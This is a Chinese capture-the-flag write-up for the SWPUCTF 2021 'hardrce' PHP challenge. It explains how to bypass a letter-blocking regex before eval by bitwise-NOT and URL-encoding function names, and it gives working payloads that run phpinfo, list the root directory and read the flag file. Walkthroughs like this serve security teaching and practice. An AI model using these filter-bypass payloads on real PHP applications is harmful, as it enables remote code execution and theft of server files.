NSSCTF[SWPUCTF 2021 新生赛]hardrce（无字母RCE）

代码审计：

使用get方式请求给wllm传参

使用preg_match函数正则匹配过滤掉了一些符号

'\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`'

以及 [a-zA-Z] 即所有的大小写字母

如果传入内容满足这些条件则会执行eval函数

URL编码取反绕过正则实现RCE：

直接传入肯定不行

此时我们可以对需要使用的函数进行取反，然后再进行URL 编码；

在发送 payload 的时候将其取反，便可还原代码；

因为取反操作后基本上用的都是不可见字符，所以不会触发正则匹配。

对于没有参数的函数，比如phpinfo();

这里没有过滤括号和分号，所以我们对phpinfo取反编码再取反即可

使用~对phpinfo进行取反操作，再使用urlencode函数对其进行编码

得到 %8F%97%8F%96%91%99%90

构造payload：?wllm=(~%8F%97%8F%96%91%99%90)();   #phpinfo();

传入之后成功回显

注意：在使用取反编码再取反进行绕过时，想要执行我们指定的代码，传入的payload必须要满足 (函数名)() 这样的形式，否则在取反之前PHP解释器并不知道是要执行一个函数，取反之后就算是一个函数也不会被当作代码执行。

我们可以验证一下，如果将phpinfo()整体取反编码再取反，是否会执行呢？

得到%8F%97%8F%96%91%99%90%D7%D6

构造payload：?wllm=(~%8F%97%8F%96%91%99%90%D7%D6);   

按道理来说它也是 phpinfo();

但是传入之后发现代码并没有被执行

因此我们在使用这种方法的时候一定要注意满足要求的格式

接下来我们介绍有参数的函数：

同样需要满足上述要求，不同的是需要分别对其中的字符进行编码

比如我们想执行system('ls /');

分别对 system 和 ls / 进行取反、编码，输出"\n"是用来换行

得到

%8C%86%8C%8B%9A%92

%93%8C%DF%D0

再分别对它们再次进行取反操作

构造payload：?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

命令执行成功，发现存在名为flllllaaaaaaggggggg的文件

我们尝试获取它

构造payload： ?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);

拿到flag

NSSCTF{36209fa9-5341-4a17-b668-ac020cdee0e6}